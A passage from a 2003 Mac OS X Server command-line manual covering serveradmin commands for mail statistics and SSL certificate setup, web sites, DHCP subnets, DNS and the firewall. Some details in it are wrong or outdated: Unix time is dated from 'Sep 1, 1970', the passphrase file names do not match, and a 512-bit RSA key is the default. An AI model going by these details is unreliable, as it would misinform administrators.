Default = "/var/imap" imap:sasl_maximum_layer Default = 256 imap:sendmail Default = "/usr/sbin/sendmail" imap:loginuseacl Default = no imap:mupdate_username Default = "" imap:imap_auth_plain Default = no imap:imap_auth_any Default = no imap:duplicatesuppression Default = yes imap:notifysocket Default = "/var/imap/socket/notify" imap:tls_imap_require_cert Default = no imap:imap_auth_clear Default = yes imap:tls_pop3_key_file Default = "" imap:proxyd_allow_status_referral Default = no imap:servername Default = "<hostname>" imap:logtimestamps Default = no imap:imap_auth_gssapi Default = no imap:mupdate_authname Default = "" mailman:enable_mailman Default = no Parameter (mail:) Description Command (mail:command=) Description getHistory View a periodic record of file data throughput or number of user connections. See “Listing Mail Service Statistics” on page 117. getLogPaths Display the locations of the Mail service logs. See “Viewing the Mail Service Logs” on page 118. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. LL2354.book Page 116 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 117 Listing Mail Service Statistics You can use the serveradmin getHistory command to display a log of periodic samples of the number of user connections and the data throughput. Samples are taken once each minute. To list samples: $ sudo serveradmin command mail:command = getHistory mail:variant = statistic mail:timeScale = scale Control-D Output mail:nbSamples = <samples> mail:v2Legend = "throughput" mail:samplesArray:_array_index:0:vn = <sample> mail:samplesArray:_array_index:0:t = <time> mail:samplesArray:_array_index:1:vn = <sample> mail:samplesArray:_array_index:1:t = <time> [...] mail:samplesArray:_array_index:i:vn = <sample> mail:samplesArray:_array_index:i:t = <time> mail:v1Legend = "connections" afp:currentServerTime = <servertime> Parameter Description statistic The value you want to display. Valid values: v1 - number of connected users (average during sampling period) v2 - data throughput (bytes/sec) scale The length of time in seconds, ending with the current time, for which you want to see samples. For example, to see 24 hours of data, you would specify mail:timeScale = 86400. Value displayed by getHistory Description <samples> The total number of samples listed. <sample> The numerical value of the sample. For connections (v1), this is integer average number of users. For throughput, (v2), this is integer bytes per second. <time> The time at which the sample was measured. A standard UNIX time (number of seconds since Sep 1, 1970.) Samples are taken every 60 seconds. LL2354.book Page 117 Monday, October 20, 2003 9:47 AM 118 Chapter 11 Working With Mail Service Viewing the Mail Service Logs You can use tail or any other file listing tool to view the contents of the Mail service logs. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the Mail service logs are located. To display the log locations: $ sudo serveradmin command mail:command = getLogPaths Output mail:Server Log = <server-log> mail:Lists qrunner = <lists-log> mail:Lists post = <postings-log> mail:Lists smtp = <delivery-log> mail:Lists subscribe = <subscriptions-log> mail:SMTP Log = <smtp-log> mail:POP Log = <pop-log> mail:Lists error = <listerrors-log> mail:IMAP Log = <imap-log> mail:Lists smtp-failure = <failures-log> Value Description <server-log> The location of the server log. Default = srvr.log <lists-log> The location of the Mailing Lists log. Default = /private/var/mailman/logs/qrunner <postings-log> The location of the Mailing Lists Postings log. Default = /private/var/mailman/logs/post <delivery-log> The location of the Mailing Lists Delivery log. Default = /private/var/mailman/logs/smtp <subscriptions-log> The location of the Mailing Lists Subscriptions log. Default = /private/var/mailman/logs/subscribe <smtp-log> The location of the server log. Default = smtp.log <pop-log> The location of the server log. Default = pop3.log <listerrors-log> The location of the Mailing Lists Error log. Default = /private/var/mailman/logs/error <imap-log> The location of the server log. Default = imap.log <failures-log> The location of the Mailing Lists Delivery Failures log. Default = /private/var/mailman/logs/smtp-failure LL2354.book Page 118 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 119 Setting Up SSL for Mail Service Mail service requires some configuration to provide Secure Sockets Layer (SSL) connections automatically. The basic steps are as follows: • Generate a Certificate Signing Request (CSR) and create a keychain. • Obtain an SSL certificate from an issuing authority. • Import the SSL certificate into the keychain. • Create a passphrase file. Generating a CSR and Creating a Keychain To begin configuring Mail service for SSL connections, you generate a CSR and create a keychain by using the command-line tool certtool. A CSR is a file that provides information needed to issue an SSL certificate. 1 Log in to the server as root. 2 In the Terminal application, type the following two commands: $ cd /private/var/root/Library/Keychains/ $ /usr/bin/certtool r csr.txt k=certkc c This use of the certtool command begins an interactive process that generates a Certificate Signing Request (CSR) in the file csr.txt and creates a keychain named certkc. 3 In the New Keychain Passphrase dialog that appears, enter a passphrase or password for the keychain you’re creating, enter the password or passphrase a second time to verify it, and click OK. Remember this passphrase, because later you must supply it again. 4 When “Enter key and certificate label:” appears in the Terminal window, type a one- word key, a blank space, and a one-word certificate label, then press Return. For example, you could type your organization’s name as the key and mailservice as the certificate label. 5 Type r when prompted to select a key algorithm, then press Return. Please specify parameters for the key pair you will generate. r RSA d DSA f FEE Select key algorithm by letter: 6 Type a key size at the next prompt, then press Return. Valid key sizes for RSA are 512..2048; default is 512 Enter key size in bits or CR for default: Larger key sizes are more secure, but require more processing time on your server. Key sizes smaller than 1024 aren’t accepted by some certificate-issuing authorities. LL2354.book Page 119 Monday, October 20, 2003 9:47 AM 120 Chapter 11 Working With Mail Service 7 Type y when prompted to confirm the algorithm and key size, then press Return. You have selected algorithm RSA, key size (size entered above) bits. OK (y/anything)? 8 Type b when prompted to specify how this certificate will be used, then press Return. Enter cert/key usage (s=signing, b=signing AND encrypting): 9 Type s when prompted to select a signature algorithm, then press Return. ...Generating key pair... Please specify the algorithm with which your certificate will be signed. 5 RSA with MD5 s RSA with SHA1 Select signature algorithm by letter: 10 Type y when asked to confirm the selected algorithm, then press Return. You have selected algorithm RSA with SHA1. OK (y/anything)? 11 Enter a phrase or some random text when prompted to enter a challenge string, then press Return. ...creating CSR... Enter challenge string: 12 Enter the correct information at the next five prompts, which request the various components of the certificate’s Relative Distinguished Name (RDN), pressing return after each entry. For Common Name, enter the server's DNS name, such as server.example.com. For Country, enter the country in which your organization is located. For Organization, enter the organization to which your domain name is registered. For Organizational Unit, enter something similar to a department name. For State/Province, enter the full name of your state or province. 13 Type y when asked to confirm the information you entered, then press Return. Is this OK (y/anything)? When you see a message about writing to csr.txt, you have successfully generated a CSR and created the keychain that Mail service needs for SSL connections. Wrote (n) bytes of CSR to csr.txt LL2354.book Page 120 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 121 Obtaining an SSL Certificate After generating a CSR and a keychain, you continue configuring Mail service for automatic SSL connections by purchasing an SSL certificate from a certificate authority such as Verisign or Thawte. You can do this by completing a form on the certificate authority’s website. When prompted for your CSR, open the csr.txt file using a text editor such as TextEdit. Then copy and paste the contents of the file into the appropriate field on the certificate authority’s website. The websites for these certificate authorities are at • www.verisign.com • www.thawte.com When you receive your certificate, save it in a text file named sslcert.txt. You can save this file with the TextEdit application. Make sure the file is plain text, not rich text, and contains only the certificate text. Importing an SSL Certificate Into the Keychain To import an SSL certificate into a keychain, use the command-line tool certtool. This continues the configuration of Mail service for automatic SSL connections. 1 Log in to the server as root. 2 Open the Terminal application. 3 Go to the directory where the saved certificate file is located. For example, type cd /private/var/root/Desktop and press Return if the certificate file is saved on the desktop of the root user. 4 Type the following command and press Return: certtool i sslcert.txt k=certkc Using certtool this way imports a certificate from the file named sslcert.txt into the keychain named certkc. A message on screen confirms that the certificate was successfully imported. ...certificate successfully imported. LL2354.book Page 121 Monday, October 20, 2003 9:47 AM 122 Chapter 11 Working With Mail Service Creating a Passphrase File To create a passphrase file, you will use TextEdit, then change the privileges of the file using the Terminal application. This file contains the passphrase you specified when you created the keychain. Mail service will automatically use the passphrase file to unlock the keychain that contains the SSL certificate. This concludes configuring Mail service for automatic SSL connections. 1 Log in to the server as root (if you’re not already logged in as root). 2 In TextEdit, create a new file and type the passphrase exactly as you entered it when you created the keychain. Don’t press Return after typing the passphrase. 3 Make the file plain text by choosing Make Plain Text from the Format menu. 4 Save the file, naming it cerkc.pass. 5 Move the file to the root keychain folder. The path is /private/var/root/Library/Keychains/. To see the root keychain folder in the Finder, choose Go to Folder from the Go menu, then type /private/var/root/Library/Keychains/ and click Go. 6 In the Terminal application, change the access privileges to the passphrase file so only root can read and write to this file. Do this by typing the following two commands, pressing Return after each one: cd /private/var/root/Library/Keychains/ chmod 600 certkc.pass Mail service of Mac OS X Server can now use SSL for secure IMAP connections. 7 Log out as root. Note: If Mail service is running, you need to stop it and start it again to make it recognize the new certificate keychain. Setting Up SSL for Mail Service on a Headless Server If you want to set up SSL for Mail service on a server that doesn’t have a display, first follow the instructions in the sections: • “Generating a CSR and Creating a Keychain” on page 119 • “Obtaining an SSL Certificate” on page 121 • “Importing an SSL Certificate Into the Keychain” on page 121 • “Creating a Passphrase File” on this page Then copy the keychain file “certkc” and the keychain passphrase file “certkc.pass” to the root keychain folder on the headless server. The path on the headless server is /private/var/root/Library/Keychains/. LL2354.book Page 122 Monday, October 20, 2003 9:47 AM 12 123 12 Working With Web Technologies Commands you can use to manage Web service in Mac OS X Server. Starting and Stopping Web Service To start Web service: $ sudo serveradmin start web To stop Web service: $ sudo serveradmin stop web Checking Web Service Status To see if Web service is running: $ sudo serveradmin status web To see complete Web service status: $ sudo serveradmin fullstatus web Viewing Web Settings You can use serveradmin to view your server’s Web service configuration. However, if you want to work with the Web service from the command-line, you’ll probably find it more straightforward to work directly with the underlying Apache web server. For information on Apache settings, visit www.apache.org. To list all Web service settings: $ sudo serveradmin settings web To list a particular setting: $ sudo serveradmin settings web:setting LL2354.book Page 123 Monday, October 20, 2003 9:47 AM 124 Chapter 12 Working With Web Technologies To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings web:IFModule:_array_id:mod_alias.c:* Changing Web Settings You can use serveradmin to modify your server’s Web service configuration. However, if you want to work with the Web service from the command-line, you’ll probably find it more straightforward to work directly with the underlying Apache web server. For information on Apache, visit www.apache.org. serveradmin and Apache Settings The parameters are written differently in the Apache configuration file than they are in serveradmin. For example, this block of Apache configuration parameters <IfModule mod_macbinary_apple.c> MacBinary On MacBinaryBlock html shtml perl pl cgi jsp php phps asp scpt MacBinaryBlock htaccess </IfModule> appear as follows in serveradmin web:IfModule:_array_id:mod_macbinary_apple.c:MacBinary = yes web:IfModule:_array_id:mod_macbinary_apple.c:MacBinaryBlock:_array_index:0 = "html shtml perl pl cgi jsp php phps asp scpt" web:IfModule:_array_id:mod_macbinary_apple.c:MacBinaryBlock:_array_index:1 = "htaccess". For information on Apache settings, visit www.apache.org. Changing Settings Using serveradmin You can change Web service settings using the serveradmin command. To change a setting: $ sudo serveradmin settings web:setting = value Parameter Description setting A Web service setting. To see a list of available settings, type $ sudo serveradmin settings web value An appropriate value for the setting. LL2354.book Page 124 Monday, October 20, 2003 9:47 AM Chapter 12 Working With Web Technologies 125 To change several settings: $ sudo serveradmin settings web:setting = value web:setting = value web:setting = value [...] Control-D Web serveradmin Commands You can use the following commands with the serveradmin application to manage Web service. Listing Hosted Sites You can use the serveradmin getSites command to display a list of the sites hosted by the server along with basic settings and status. To list sites: $ sudo serveradmin command web:command = getSites Viewing Service Logs You can use tail or any other file listing tool to view the contents of Web service access and error logs for each site hosted by the server. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current error and activity logs for each site are located. To display the log paths: $ sudo serveradmin command web:command = getLogPaths Command (web:command=) Description getHistory View Web service statistics. See “Viewing Service Statistics” on page 126. getLogPaths Finding the access and error logs for each hosted site. See “Viewing Service Logs” on this page. getSites Listing existing sites. See “Listing Hosted Sites” on this page. LL2354.book Page 125 Monday, October 20, 2003 9:47 AM 126 Chapter 12 Working With Web Technologies Viewing Service Statistics You can use the serveradmin getHistory command to display a log of periodic samples of the number of requests, cache performance, and data throughput. Samples are taken once each minute. To list samples: $ sudo serveradmin command qtss:command = getHistory qtss:variant = statistic qtss:timeScale = scale Control-D Output web:nbSamples = <samples> web:samplesArray:_array_index:0:vn = <sample> web:samplesArray:_array_index:0:t = <time> web:samplesArray:_array_index:1:vn = <sample> web:samplesArray:_array_index:1:t = <time> [...] web:samplesArray:_array_index:i:vn = <sample> web:samplesArray:_array_index:i:t = <time> web:vnLegend = "<legend>" web:currentServerTime = <servertime> Parameter Description statistic The value you want to display. Valid values: v1 - number of requests per second v2 - throughput (bytes/sec) v3 - cache requests per second v4 - cache throughput (bytes/sec) scale The length of time in seconds, ending with the current time, for which you want to see samples. For example, to see 30 minutes of data, you would specify qtss:timeScale = 1800. Value displayed by getHistory Description <samples> The total number of samples listed. <legend> A textual description of the selected statistic. "REQUESTS_PER_SECOND" for v1 "THROUGHPUT" for v2 "CACHE_REQUESTS_PER_SECOND" for v3 "CACHE_THROUGHPUT" for v4 <sample> The numerical value of the sample. <time> The time at which the sample was measured. A standard UNIX time (number of seconds since Sep 1, 1970.) Samples are taken every 60 seconds. LL2354.book Page 126 Monday, October 20, 2003 9:47 AM Chapter 12 Working With Web Technologies 127 Example Script for Adding a Website The following script shows how you can use serveradmin to add a website to the server’s Web service configuration. The script uses two files: • addsite The actual script you run. It accepts values for the site’s IP address, port number, server name, and root directory and uses sed to substitute these values in the settings it reads from the second file (addsite.in) feeds to serveradmin. • addsite.in Contains the actual settings (with placeholders for values you provide when you run addsite) used to create the website. The addsite File sed -es#_ipaddr#$1#g -es#_port#$2#g -es#_servername#$3#g -es#_docroot#$4#g ./addsite.in | /usr/sbin/serveradmin --set -i The addsite.in File web:Sites:_array_id:_ipaddr\:_port__servername = create web:Sites:_array_id:_ipaddr\:_port__servername:Listen:_array_index:0 = "_ipaddr:_port" web:Sites:_array_id:_ipaddr\:_port__servername:ServerName = _servername web:Sites:_array_id:_ipaddr\:_port__servername:ServerAdmin = admin@_servername web:Sites:_array_id:_ipaddr\:_port__servername:DirectoryIndex:_array_index:0 = "index.html" web:Sites:_array_id:_ipaddr\:_port__servername:DirectoryIndex:_array_index:1 = "index.php" web:Sites:_array_id:_ipaddr\:_port__servername:WebMail = yes web:Sites:_array_id:_ipaddr\:_port__servername:CustomLog:_array_index:0: Format = "%{User-agent}i" web:Sites:_array_id:_ipaddr\:_port__servername:CustomLog:_array_index:0: enabled = yes web:Sites:_array_id:_ipaddr\:_port__servername:CustomLog:_array_index:0: ArchiveInterval = 0 web:Sites:_array_id:_ipaddr\:_port__servername:CustomLog:_array_index:0: Path = "/private/var/log/httpd/access_log" web:Sites:_array_id:_ipaddr\:_port__servername:CustomLog:_array_index:0: Archive = yes web:Sites:_array_id:_ipaddr\:_port__servername:Directory:_array_id: /Library/WebServer/Documents:Options:Indexes = yes web:Sites:_array_id:_ipaddr\:_port__servername:Directory:_array_id: /Library/WebServer/Documents:Options:ExecCGI = no web:Sites:_array_id:_ipaddr\:_port__servername:Directory:_array_id: /Library/WebServer/Documents:AuthName = "Test Site" web:Sites:_array_id:_ipaddr\:_port__servername:ErrorLog:ArchiveInterval = 0 web:Sites:_array_id:_ipaddr\:_port__servername:ErrorLog:Path = "/private/var/log/httpd/error_log" web:Sites:_array_id:_ipaddr\:_port__servername:ErrorLog:Archive = no web:Sites:_array_id:_ipaddr\:_port__servername:Include:_array_index:0 = "/etc/httpd/httpd_squirrelmail.conf" web:Sites:_array_id:_ipaddr\:_port__servername:enabled = yes LL2354.book Page 127 Monday, October 20, 2003 9:47 AM 128 Chapter 12 Working With Web Technologies web:Sites:_array_id:_ipaddr\:_port__servername:ErrorDocument:_array_index:0: StatusCode = 404 web:Sites:_array_id:_ipaddr\:_port__servername:ErrorDocument:_array_index:0: Document = "/nwesite_notfound.html" web:Sites:_array_id:_ipaddr\:_port__servername:LogLevel = "warn" web:Sites:_array_id:_ipaddr\:_port__servername:IfModule:_array_id:mod_ssl.c: SSLEngine = no web:Sites:_array_id:_ipaddr\:_port__servername:IfModule:_array_id:mod_ssl.c: SSLPassPhrase = "" web:Sites:_array_id:_ipaddr\:_port__servername:IfModule:_array_id:mod_ssl.c: SSLLog = "/private/var/log/httpd/ssl_engine_log" web:Sites:_array_id:_ipaddr\:_port__servername:DocumentRoot = "_docroot" web:Sites:_array_id:_ipaddr\:_port__servername To run the script: $ addsite ipaddress port name root If you get the message “command not found” when you try to run the script, precede the command with the full path to the script file. For example, /users/admin/documents/addsite 10.0.0.2 80 corpsite /users/webmaster/sites/corpsite Or, use cd to change to the directory that contains the file and precede the command with ./. For example: $ cd /users/admin/documents $ ./addsite 10.0.0.2 80 corpsite /users/webmaster/sites/corpsite Parameter Description ipaddress The IP address for the site. port The port number to be used to for HTTP access to the site. name The name of the site. root The root directory for the site’s files and subdirectories. LL2354.book Page 128 Monday, October 20, 2003 9:47 AM 13 129 13 Working With Network Services Commands you can use to manage DHCP, DNS, Firewall, NAT, and VPN service in Mac OS X Server. DHCP Service Starting and Stopping DHCP Service To start DHCP service: $ sudo serveradmin start dhcp To stop DHCP service: $ sudo serveradmin stop dhcp Checking the Status of DHCP Service To see summary status of DHCP service: $ sudo serveradmin status dhcp To see detailed status of DHCP service: $ sudo serveradmin fullstatus dhcp Viewing DHCP Service Settings To list DHCP service configuration settings: $ sudo serveradmin settings dhcp To list a particular setting: $ sudo serveradmin settings dhcp:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings dhcp:subnets:* LL2354.book Page 129 Monday, October 20, 2003 9:47 AM 130 Chapter 13 Working With Network Services Changing DHCP Service Settings To change a setting: $ sudo serveradmin settings dhcp:setting = value To change several settings: $ sudo serveradmin settings dhcp:setting = value dhcp:setting = value dhcp:setting = value [...] Control-D DHCP Service Settings Use the following parameters with the serveradmin command to change settings for the dhcp service. Parameter Description setting A DHCP service setting. To see a list of available settings, type $ sudo serveradmin settings dhcp or see “DHCP Service Settings” on this page and “DHCP Subnet Settings Array” on page 131. value An appropriate value for the setting. Parameter (dhcp:) Description logging_level "LOW"|"MEDIUM"|"HIGH" Default = "MEDIUM" Corresponds to the Log Detail Level pop-up menu in the Logging pane of DHCP service settings in the Server Admin GUI application. subnet_status Default = 0 subnet_defaults:logVerbosity "LOW"|"MEDIUM"|"HIGH" Default = "MEDIUM" subnet_defaults:logVerbosityList: _array_index:n Available values for the logVerbosity setting. Default = "LOW," "MEDIUM," and "HIGH" subnet_defaults:WINS_node_type Default = "NOT_SET" subnet_defaults:routers Default = empty_dictionary subnet_defaults:selected_port_key Default = en0 subnet_defaults:selected_port_key _list:_array_index:n An array of available ports. subnet_defaults:dhcp_domain_name Default = The last portion of the server’s host name, for example, company.com. LL2354.book Page 130 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 131 DHCP Subnet Settings Array An array of the settings listed in the following table is included in the DHCP service settings for each subnet you define. You can add a subnet to the DHCP configuration by using serveradmin to add an array of these settings. About Subnet IDs In an actual list of settings, <subnetID> is replaced with a unique ID code for the subnet. The IDs generated by the server are just random numbers. The only requirement for this ID is that it be unique among the subnets defined on the server. subnet_defaults:dhcp_domain_name_ server:_array_index:n Default = The DNS server addresses provided during server setup, as listed in the Network pane of the server’s System Preferences. subnets:_array_id:<subnetID>... An array of settings for a particular subnet. <subnetID> is a unique identifier for each subnet. See “DHCP Subnet Settings Array” on this page. Parameter (dhcp:) Description Subnet Parameter subnets:_array_id:<subnetID>: Description descriptive_name A textual description of the subnet. Corresponds to the Subnet Name field in the General pane of the subnet settings in the Server Admin GUI application. dhcp_domain_name The default domain for DNS searches, for example, company.com. Corresponds to the Default Domain field in the DNS pane of the subnet settings in the Server Admin GUI application. dhcp_domain_name_server: _array_index:n The primary WINS server to be used by clients. Corresponds to the Name Servers field in the DNS pane of the subnet settings in the Server Admin GUI application. dhcp_enabled Whether DHCP is enabled for this subnet. Corresponds to the Enable checkbox in the list of subnets in the Subnets pane of the DHCP settings in the Server Admin GUI application. dhcp_ldap_url: _array_index:n The URL of the LDAP directory to be used by clients. Corresponds to the Lease URL field in the LDAP pane of the subnet settings in the Server Admin GUI application. dhcp_router The IPv4 address of the subnet’s router. Corresponds to the Router field in the General pane of the subnet settings in the Server Admin GUI application. LL2354.book Page 131 Monday, October 20, 2003 9:47 AM 132 Chapter 13 Working With Network Services lease_time_secs Lease time in seconds. Default = "3600" Corresponds to the Lease Time pop-up menu and field in the General pane of the subnet settings in the Server Admin GUI application. net_address The IPv4 network address for the subnet. net_mask The subnet mask for the subnet. Corresponds to the Subnet Mask field in the General pane of the subnet settings in the Server Admin GUI application. net_range_end The highest available IPv4 address for the subnet. Corresponds to the Ending IP Address field in the General pane of the subnet settings in the Server Admin GUI application. net_range_start The lowest available IPv4 address for the subnet. Corresponds to the Starting IP Address field in the General pane of the subnet settings in the Server Admin GUI application. selected_port_name The network port for the subnet. Corresponds to the Network Interface pop-up menu in the General pane of the subnet settings in the Server Admin GUI application. WINS_NBDD_server The NetBIOS Datagram Distribution Server IPv4 address. Corresponds to the NBDD Server field in the WINS pane of the subnet settings in the Server Admin GUI application. WINS_node_type The WINS node type. Can be set to: "" (not set, default) BROADCAST_B_NODE PEER_P_NODE MIXED_M_NODE HYBRID-H-NODE Corresponds to the NBT Node Type field in the WINS pane of the subnet settings in the Server Admin GUI application. WINS_primary_server The primary WINS server to be used by clients. Corresponds to the WINS/NBNS Primary Server field in the WINS pane of the subnet settings in the Server Admin GUI application. Subnet Parameter subnets:_array_id:<subnetID>: Description LL2354.book Page 132 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 133 Adding a DHCP Subnet You may already have a subnet for each port you enabled when you installed and set up the server. You can use the serveradmin settings command to check for subnets that the server set up for you; see “Viewing DHCP Service Settings” on page 129. You can use the serveradmin settings command to add other subnets to your DHCP configuration. Note: Be sure to include the special first setting (ending with = create). This is how you tell serveradmin to create the necessary settings array with the specified subnet ID. To add a subnet: $ sudo serveradmin settings dhcp:subnets:_array_id:subnetID = create dhcp:subnets:_array_id:subnetID:WINS_NBDD_server = nbdd-server dhcp:subnets:_array_id:subnetID:WINS_node_type = node-type dhcp:subnets:_array_id:subnetID:net_range_start = start-address dhcp:subnets:_array_id:subnetID:WINS_scope_id = scope-ID dhcp:subnets:_array_id:subnetID:dhcp_router = router dhcp:subnets:_array_id:subnetID:net_address = net-address dhcp:subnets:_array_id:subnetID:net_range_end = end-address dhcp:subnets:_array_id:subnetID:lease_time_secs = lease-time dhcp:subnets:_array_id:subnetID:dhcp_ldap_url:_array_index:0 = ldap-server dhcp:subnets:_array_id:subnetID:WINS_secondary_server = wins-server-2 dhcp:subnets:_array_id:subnetID:descriptive_name = description dhcp:subnets:_array_id:subnetID:WINS_primary_server = wins-server-1 dhcp:subnets:_array_id:subnetID:dhcp_domain_name = domain dhcp:subnets:_array_id:subnetID:dhcp_enabled = (yes|no) dhcp:subnets:_array_id:subnetID:dhcp_domain_name_server:_array_index:0 = dns-server-1 dhcp:subnets:_array_id:subnetID:dhcp_domain_name_server:_array_index:1 = dns-server-2 dhcp:subnets:_array_id:subnetID:net_mask = mask dhcp:subnets:_array_id:subnetID:selected_port_name = port Control-D WINS_scope_id A domain name such as apple.com. Default = "" Corresponds to the NetBIOS Scope ID field in the WINS pane of the subnet settings in the Server Admin GUI application. WINS_secondary_server The secondary WINS server to be used by clients. Corresponds to the WINS/NBNS Secondary Server field in the WINS pane of the subnet settings in the Server Admin GUI application. Subnet Parameter subnets:_array_id:<subnetID>: Description LL2354.book Page 133 Monday, October 20, 2003 9:47 AM 134 Chapter 13 Working With Network Services List of DHCP serveradmin Commands You can use the following command with the serveradmin application to manage DHCP service. Viewing the DHCP Service Log You can use tail or any other file listing tool to view the contents of the DHCP service log. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current DHCP log is located. To display the log path: $ sudo serveradmin command dhcp:command = getLogPaths Output dhcp:systemLog = <system-log> Parameter Description subnetID A unique number that identifies the subnet. Can be any number not already assigned to another subnet defined on the server. Can include embedded hyphens (-). dns-server-n To specify additional DNS servers, add additional dhcp_name_server settings, incrementing _array_index:n for each additional value. Other parameters The standard subnet settings described under “DHCP Subnet Settings Array” on page 131. Command (dhcp:command=) Description getLogPaths Determine the location of the DHCP service logs. Value Description <system-log> The location of the DNS service log. Default = /var/logs/system.log LL2354.book Page 134 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 135 DNS Service Starting and Stopping the DNS Service To start DNS service: $ sudo serveradmin start dns To stop DNS service: $ sudo serveradmin stop dns Checking the Status of DNS Service To see summary status of DNS service: $ sudo serveradmin status dns To see detailed status of DNS service: $ sudo serveradmin fullstatus dns Viewing DNS Service Settings To list DNS service configuration settings: $ sudo serveradmin settings dns To list a particular setting: $ sudo serveradmin settings dns:setting To list a group of settings: Type only as much of the name as you want, stopping at a colon (:), then type an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings dns:zone:_array_id:localhost:* Changing DNS Service Settings You can use serveradmin to modify your server’s DNS configuration. However, you’ll probably find it more straightforward to work directly with DNS and BIND using the standard tools and techniques described in the many books on the subject. (See, for example, “DNS and BIND” by Paul Albitz and Cricket Liu.) DNS Service Settings To list the settings, see “Viewing DNS Service Settings” on this page. List of DNS serveradmin Commands Viewing the DNS Service Log You can use tail or any other file listing tool to view the contents of the DNS service log. Command (dns:command=) Description getLogPaths Find the location of the DNS service log. See “Viewing the DNS Service Log” on this page. getStatistics Retrieve DNS service statistics. See “Listing DNS Service Statistics” on page 136. LL2354.book Page 135 Monday, October 20, 2003 9:47 AM 136 Chapter 13 Working With Network Services To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current DNS log is located. The default is /Library/Logs/named.log. To display the log path: $ sudo serveradmin command dns:command = getLogPaths Listing DNS Service Statistics You can use the serveradmin getStatistics command to display a summary of current DNS service workload. To list statistics: $ sudo serveradmin command dns:command = getStatistics Sample Output dns:queriesArray:_array_index:0:name = "NS_QUERIES" dns:queriesArray:_array_index:0:value = -1 dns:queriesArray:_array_index:1:name = "A_QUERIES" dns:queriesArray:_array_index:1:value = -1 dns:queriesArray:_array_index:2:name = "CNAME_QUERIES" dns:queriesArray:_array_index:2:value = -1 dns:queriesArray:_array_index:3:name = "PTR_QUERIES" dns:queriesArray:_array_index:3:value = -1 dns:queriesArray:_array_index:4:name = "MX_QUERIES" dns:queriesArray:_array_index:4:value = -1 dns:queriesArray:_array_index:5:name = "SOA_QUERIES" dns:queriesArray:_array_index:5:value = -1 dns:queriesArray:_array_index:6:name = "TXT_QUERIES" dns:queriesArray:_array_index:6:value = -1 dns:nxdomain = 0 dns:nxrrset = 0 dns:reloadedTime = "" dns:success = 0 dns:failure = 0 dns:recursion = 0 dns:startedTime = "2003-09-10 11:24:03 -0700" dns:referral = 0 Firewall Service Starting and Stopping Firewall Service To start Firewall service: $ sudo serveradmin start ipfilter To stop Firewall service: $ sudo serveradmin stop ipfilter LL2354.book Page 136 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 137 Checking the Status of Firewall Service To see summary status of Firewall service: $ sudo serveradmin status ipfilter To see detailed status of Firewall service, including rules: $ sudo serveradmin fullstatus ipfilter Viewing Firewall Service Settings To list Firewall service configuration settings: $ sudo serveradmin settings ipfilter To list a particular setting: $ sudo serveradmin settings ipfilter:setting To list a group of settings: Type only as much of the name as you want, stopping at a colon (:), then type an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings ipfilter:ipAddressGroups:* Changing Firewall Service Settings To change a setting: $ sudo serveradmin settings ipfilter:setting = value To change several settings: $ sudo serveradmin settings ipfilter:setting = value ipfilter:setting = value ipfilter:setting = value [...] Control-D Firewall Service Settings Use the following parameters with the serveradmin command to change settings for the IPFilter service. Parameter Description setting A IPFilter service setting. See “Firewall Service Settings” on this page. value An appropriate value for the setting. Parameter (ipfilter:) Description ipAddressGroupsWithRules: _array_id:<group>... An array of settings describing the services allowed for specific IP address groups. See “IPFilter Groups With Rules Array” on page 138. rules:_array_id:<rule>:... Arrays of rule settings, one array per defined rule. See “IPFilter Rules Array” on page 141. LL2354.book Page 137 Monday, October 20, 2003 9:47 AM 138 Chapter 13 Working With Network Services IPFilter Groups With Rules Array An array of the following settings is included in the IPFilter settings for each defined IP address group. These arrays aren’t part of a standard ipfw configuration, but are created by the Server Admin GUI application to implement the IP Address groups on the General pane of the Firewall service settings. In an actual list of settings, <group> is replaced with an IP address group. Defining Firewall Rules You can use serveradmin to set up firewall rules for your server. However, a simpler method is to add your rules to a configuration file used by the service. By modifying the file, you’ll be able to define your rules using standard rule syntax instead of creating a specialized array to store the rule’s components. Adding Rules by Modifying ipfw.conf The file in which you can define your rules is /etc/ipfilter/ipfw.conf. The Firewall service reads this file, but doesn’t modify it. Its contents are annotated and include commented-out rules you can use as models. Its default contents are listed below. For more information, read the ipfw man page. logAllDenied Specifies whether to log all denials. Default = no ipAddressGroups:_array_id: n:address The address of a defined IP address group, the first element of an array that defines an IP address group. ipAddressGroups:_array_id: n:name The name of a defined IP address group, the second element of an array that defines an IP address group. logAllAllowed Whether to log access allowed by rules. Default = no Parameter (ipfilter:) Description Parameter (ipfilter:) Description ipAddressGroupsWithRules: _array_id:<group>:rules An array of rules for the group. ipAddressGroupsWithRules: _array_id:<group>:addresses The group’s address. ipAddressGroupsWithRules: _array_id:<group>:name The group’s name. ipAddressGroupsWithRules: _array_id:<group>:readOnly Whether the group is set for read-only. LL2354.book Page 138 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 139 The unmodified ipfw.conf file: # ipfw.conf.default - Installed by Apple, never modified by Server Admin app # # ipfw.conf - The servermgrd process (the back end of Server Admin app) # creates this from ipfw.conf.default if it's absent, but does not modify # it. # # Administrators can place custom ipfw rules in ipfw.conf. # # Whenever a change is made to the ipfw rules by the Server Admin # application and saved: # 1. All ipfw rules are flushed # 2. The rules defined by the Server Admin app (stored as plists) # are exported to /etc/ipfilter/ipfw.conf.apple and loaded into the # firewall via ipfw. # 3. The rules in 